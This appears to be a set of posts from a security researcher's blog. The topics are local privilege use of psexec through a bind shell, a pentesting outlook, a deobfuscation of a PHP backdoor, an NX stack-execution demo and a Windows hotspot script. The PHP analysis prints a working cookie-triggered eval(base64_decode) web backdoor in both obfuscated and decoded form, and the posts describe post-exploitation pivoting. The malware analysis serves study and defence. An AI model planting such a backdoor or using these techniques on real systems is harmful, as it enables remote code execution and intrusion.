Leveraging psexec locally to execute privileged command..

Gong Xi Fa Choy to all of you. Not really a good start year for me, my daughter is sick. But I need to go to Jakarta next week to teach  a Digital Forensics/Anti-Forensic class. Okay anyway this is another trick to use sysinternal tools in a hackish way.

Case Study

1. In a social engineering campaign attack, you managed to pivot your way into a machine with low privileged (guest) windows access machine.
2. You have an admin privileged  username and password but RDP is impossible or runas doesn`t work.
3. Ingress/Outgress Firewall kicked in.. so psexec remotely is impossible.
4. For Fun!!!!!

Suppose a we backdoored a normal user with a bind shell at port 4444

As you can see add user is kinda impossible due to limited priviledge. Let's assume we know the password of user admin which is admin123 .    Can we use runas command?

It seems our runas command failed due to the fact that our bindshell backdoor is an interactive shell  that couldn`t compensate normal stdin..

All hope is loss? Nope we can use psexec to bypass this circumstances.  I would say "psexec is  like sudo"

Why do I like psexec? I believe internal tools is the "universal windows backdoor."

This idea pops up thanks to stackoverflow http://stackoverflow.com/questions/12456675/single-line-command-for-run-as-different-user-in-window-7-that-contain-password

2014: The Age of Pentest Apocalypse.

Happy new year everyone.

We are entering 2014. After doing pentest for so many years.... I can safely say "Penetration Testing is Dead". I am not the first person to declare such statement . Popping a remote shell and rooting is quite challenging for the last 2 years (challenging but not impossible).

Summary from year 2013.

1. Secured Framework is being deployed widely .
2. IPS/IDS being deployed widely (Juniper/Bluecoat/blax3) .
3. HIPS becoming quite common  (whitelisting application)
4. SQL Injection /XSS /Remote Code Exec  still exist . But no longer straightforward ,it's quitre rare to see ' or 1=1 # , but sometimes ' or  RAND() > 0.5 still works , wide usage of WAF
5. VA is deadly inaccurate...... (it might cover most but not all).
6. Local clients are willing to sign up for more offensive security testing approach. (brutefoce attack , sniffing etcx3).
7. Weak/Default credential seems to be the weakest link of all time.

mandatory Skills required in this age.

1. The Art Of Tunneling and Pivoting... It's mandatory to mitigate firewall.
2. Bypassing Antivirus IDS IPS.. need to say more, implementing own VM....
3. Bypassing HIPS, executing unlisted/blacklisted binary outside whitelist domain usually windows
4. Bypassing noexec()... knowledge on ld based rootkit might help. usually nix
5. Forensics and Anti-Forensics technique.
6. Modifiying PoC exploits to suitable your needs.. ms08-067 is just not there anymore  lolz.

Expect to see more revolution in 2014 pentest.!!!



P/S: If someone comes and around and **shitng u about great Tools. Tell em pentest is dead.

Iloveyou PHP Backdoor

One of my botnet eh honeynet managed to caught up this nifty PHP script.

$sdfv="oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19";
$kisg = str_replace("ar","","sartarrar_rarearparlaracare");
$ltjz="yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL";
$ynsx="CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9";
$dkhg="JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof";
$gsqn = $kisg("dk", "", "bdkadksdkedk64dk_dkddkecdkode");
$zuzt = $kisg("z","","zczrzezatze_zfzuznzcztzion");
$lyyq = $zuzt('', $gsqn($kisg("of", "", $dkhg.$sdfv.$ltjz.$ynsx))); $lyyq();?>

It's pretty much straight forward just by having a glance on it.

$kisg  = is actually string_replace
$gsqn =  base64_decode
$zuzt  = create_function

Cleaning this bad ware stuff  will give us

$lyyq = create_function(base64_decode("JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdpbCcgJiYgJGMoJGEpPjMpeyRrPSdvdmV5b3UnO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9"));

Final Output:

$lyyq = create_function($c='count';$a=$_COOKIE;if(reset($a)=='il' && $c($a)>3){$k='oveyou';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';})

Conclusion? The author of this backdoor must be romantic..

Replicating Malware Function For Fun and Profits!!!!

At Scan Assoc, we are allowed to play and be creative with our viruses/malware to the max without any useless restraining policy...
If you read this post  and see the video below:


U know it's fun
Basicly it's using VBS scripting to copy clipboard...

I`ve replicated similliar technique also using VBS Scripting and bat script as a POC..
It's very innovative attack for Phishing....

Source code is in the Video..
Dis is just  a POC,  there's a way to bypass latest IE security clipboard warning!!!

A simple explanation about NX/Pax works.

This is nothing more then just to recap how NX/PAX  works why it's important for us to understand for beginners on exploitation, writing CTF flags :p , and other interesting people paper.

Below is a simplest code on a bad example on how to execute a shellcode.

unsigned char code[] = "\xcc";
int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}

Explanation:

1. We declare a pointer called func*

2. Func are pointed out to the location of memory code.

3. Execute watever being pointed by func() which is to say watever code resides in code.

Try compile and run:

gcc example1.c -o example ; ./example
Segmentation fault

Why? To understand this problem . Modern compilers by default will enfoce a NX bit on the stack region of the process. Any "local  variable" that we declared will be loaded in the stack region of the memory. And what does it mean to us ? To generalize our understanding , we know a region of memory in a computer can have 3 propeties:-

1. Read ; we can read and have access to the memory

2. Write: We ca write data to the particular region.

3. Execute: The code in that particular region can be executed.

cat /proc/3976/maps 
08048000-08049000 r-xp 00000000 08:01 1447191    /root/bypassav/example
08049000-0804a000 rw-p 00000000 08:01 1447191    /root/bypassav/example
b7e62000-b7e63000 rw-p 00000000 00:00 0 
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r--p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rw-p 0015e000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rw-p 00000000 00:00 0 
b7fdf000-b7fe1000 rw-p 00000000 00:00 0 
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

As u can see right now the stack region is mark as read-write ..... no x  means dat code in that region couldn`t be executed..

Now that we understand the stack region is protected, attacker evolves their attack into ROP or ret2/wateverlib  style programming. But that's beyond the scope of this post.  Having said that it's still possible to make your code executed by using mmap trick .  To make everyone happy here i cheat a litte using execstack just to see the difference..

gcc example1.c -o example ; execstack -s example; ./example 
Trace/breakpoint trap


cat /proc/4125/maps
08048000-08049000 r-xp 00000000 08:01 1447203    /root/bypassav/example
08049000-0804a000 rwxp 00000000 08:01 1447203    /root/bypassav/example
b7e62000-b7e63000 rwxp 00000000 00:00 0 
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r-xp 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rwxp 0015e000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rwxp 00000000 00:00 0 
b7fdf000-b7fe1000 rwxp 00000000 00:00 0 
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r-xp 0001b000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rwxp 0001c000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rwxp 00000000 00:00 0          [stack]

Oh Hitb 2013 Kul starts tomorrow.. See you there soon!

bat script setting your notebook as a wireless . AP

Captive portal/Layer 2 isolation is a no no for Chromecast.. So I`m in Kelate right now,   Here's a quick bat script on setting your Windows 7 as an AP.. Run as administrator of course.

ap.bat

ECHO OFF

netsh wlan set hostednetwork mode=allow
netsh wlan set hostednetwork ssid=PUTYOUROWNSSID key=buhpasswordsendiri keyUsage=persistent
netsh wlan start hostednetwork

Use ICS with your No4G, or watever.. More infos:

http://msdn.microsoft.com/en-us/library/dd815243%28VS.85%29.aspx

Chromecast Experience in .MY Part 3

Okay part 3... It's pretty short and simple.. They say when u managed to produce a UML. The program is already completed :p